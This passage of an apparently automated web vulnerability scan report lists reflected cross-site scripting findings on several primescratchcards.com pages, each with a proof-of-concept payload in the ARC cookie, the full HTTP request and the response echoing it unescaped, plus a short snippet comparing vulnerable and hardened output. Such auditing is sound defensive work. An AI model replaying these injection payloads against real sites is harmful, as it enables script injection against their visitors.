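        (vulnerable_pixel, hardened_pixel, DOUBLE_QUOTE_PAYLOAD, '";alert(1)//'),
        (lambda ar: "<!-- ARC=" + ar + " -->", hardened_comment, COMMENT_PAYLOAD, "--><script>"),
    ]
    for vuln, safe, payload, token in cases:
        print(f"{safe.__name__:22s} vulnerable={reflects_unmodified(vuln(payload), token)} "
              f"hardened={reflects_unmodified(safe(payload), token)}")
```

The percent-encoded form the hardened URL produces (%27%3Balert%281%29%2F%2F) is the same one the server already emits when it re-issues the cookie in the Set-Cookie header of each response in this section; only the copies in the body are raw. That Set-Cookie also scopes ARC to domain=.primescratchcards.com with a one-year expiry and re-issues whatever value it received, so a value planted through any host under that domain is sent back, and renewed, on every page listed here until it is cleared. That is the "means of setting an arbitrary cookie value" the Issue detail refers to, and it is why rejecting malformed values at the server matters as much as encoding the output.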

Request

GET /images/media.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013759f27"%3balert(1)//e1dbe20273c; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013759f27%22%3Balert%281%29%2F%2Fe1dbe20273c; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013759f27";alert(1)//e1dbe20273c' border='0' width='1' height='1'>
...[SNIP]...

3.131. http://primescratchcards.com/images/media.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/media.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload bb723--><script>alert(1)</script>b0a1c6492cb was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/media.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137bb723--><script>alert(1)</script>b0a1c6492cb; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137bb723%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb0a1c6492cb; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137bb723--><script>alert(1)</script>b0a1c6492cb">
...[SNIP]...

3.132. http://primescratchcards.com/images/media.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/media.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 497bd'%3balert(1)//15e5732e970 was submitted in the ARC cookie. This input was echoed as 497bd';alert(1)//15e5732e970 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/media.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137497bd'%3balert(1)//15e5732e970; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137497bd%27%3Balert%281%29%2F%2F15e5732e970; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137497bd';alert(1)//15e5732e970&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.133. http://primescratchcards.com/images/playersclub.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/playersclub.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4b23'%3balert(1)//32d80ef87e5 was submitted in the ARC cookie. This input was echoed as c4b23';alert(1)//32d80ef87e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/playersclub.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137c4b23'%3balert(1)//32d80ef87e5; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137c4b23%27%3Balert%281%29%2F%2F32d80ef87e5; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137c4b23';alert(1)//32d80ef87e5&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.134. http://primescratchcards.com/images/playersclub.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/playersclub.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b793"%3balert(1)//1e0f1270bd7 was submitted in the ARC cookie. This input was echoed as 4b793";alert(1)//1e0f1270bd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/playersclub.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374b793"%3balert(1)//1e0f1270bd7; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301374b793%22%3Balert%281%29%2F%2F1e0f1270bd7; expires=Tue, 15-May-2012 12:38:16 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301374b793";alert(1)//1e0f1270bd7' border='0' width='1' height='1'>
...[SNIP]...

3.135. http://primescratchcards.com/images/playersclub.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/playersclub.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload adf59--><script>alert(1)</script>9a13a509d6a was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/playersclub.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137adf59--><script>alert(1)</script>9a13a509d6a; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137adf59%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9a13a509d6a; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137adf59--><script>alert(1)</script>9a13a509d6a">
...[SNIP]...

3.136. http://primescratchcards.com/images/promotions.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/promotions.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 634dd--><script>alert(1)</script>f4ababbc828 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/promotions.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137634dd--><script>alert(1)</script>f4ababbc828; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137634dd%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef4ababbc828; expires=Tue, 15-May-2012 12:38:16 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137634dd--><script>alert(1)</script>f4ababbc828">
...[SNIP]...

3.137. http://primescratchcards.com/images/promotions.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/promotions.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f55e4'%3balert(1)//6af5e83356f was submitted in the ARC cookie. This input was echoed as f55e4';alert(1)//6af5e83356f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/promotions.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f55e4'%3balert(1)//6af5e83356f; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:15 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137f55e4%27%3Balert%281%29%2F%2F6af5e83356f; expires=Tue, 15-May-2012 12:38:14 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137f55e4';alert(1)//6af5e83356f&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.138. http://primescratchcards.com/images/promotions.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/promotions.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e4a0"%3balert(1)//d5f5fbe1a5d was submitted in the ARC cookie. This input was echoed as 8e4a0";alert(1)//d5f5fbe1a5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/promotions.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301378e4a0"%3balert(1)//d5f5fbe1a5d; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301378e4a0%22%3Balert%281%29%2F%2Fd5f5fbe1a5d; expires=Tue, 15-May-2012 12:38:14 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301378e4a0";alert(1)//d5f5fbe1a5d' border='0' width='1' height='1'>
...[SNIP]...

3.139. http://primescratchcards.com/images/terms.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/terms.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 7745f--><script>alert(1)</script>d768002612a was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/terms.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301377745f--><script>alert(1)</script>d768002612a; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=1301377745f%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed768002612a; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301377745f--><script>alert(1)</script>d768002612a">
...[SNIP]...

3.140. http://primescratchcards.com/images/terms.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/terms.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d47"%3balert(1)//edab606af36 was submitted in the ARC cookie. This input was echoed as b7d47";alert(1)//edab606af36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/terms.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137b7d47"%3balert(1)//edab606af36; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137b7d47%22%3Balert%281%29%2F%2Fedab606af36; expires=Tue, 15-May-2012 12:38:24 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137b7d47";alert(1)//edab606af36' border='0' width='1' height='1'>
...[SNIP]...

3.141. http://primescratchcards.com/images/terms.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/terms.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 133fa'%3balert(1)//f7892ed5c0f was submitted in the ARC cookie. This input was echoed as 133fa';alert(1)//f7892ed5c0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/terms.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137133fa'%3balert(1)//f7892ed5c0f; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137133fa%27%3Balert%281%29%2F%2Ff7892ed5c0f; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137133fa';alert(1)//f7892ed5c0f&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.142. http://primescratchcards.com/images/underage.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/underage.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload cb889--><script>alert(1)</script>7c8fb9ac580 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/underage.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137cb889--><script>alert(1)</script>7c8fb9ac580; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137cb889%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7c8fb9ac580; expires=Tue, 15-May-2012 12:38:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137cb889--><script>alert(1)</script>7c8fb9ac580">
...[SNIP]...

3.143. http://primescratchcards.com/images/underage.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/underage.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3da0'%3balert(1)//5a270d6e34e was submitted in the ARC cookie. This input was echoed as e3da0';alert(1)//5a270d6e34e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/underage.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137e3da0'%3balert(1)//5a270d6e34e; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137e3da0%27%3Balert%281%29%2F%2F5a270d6e34e; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
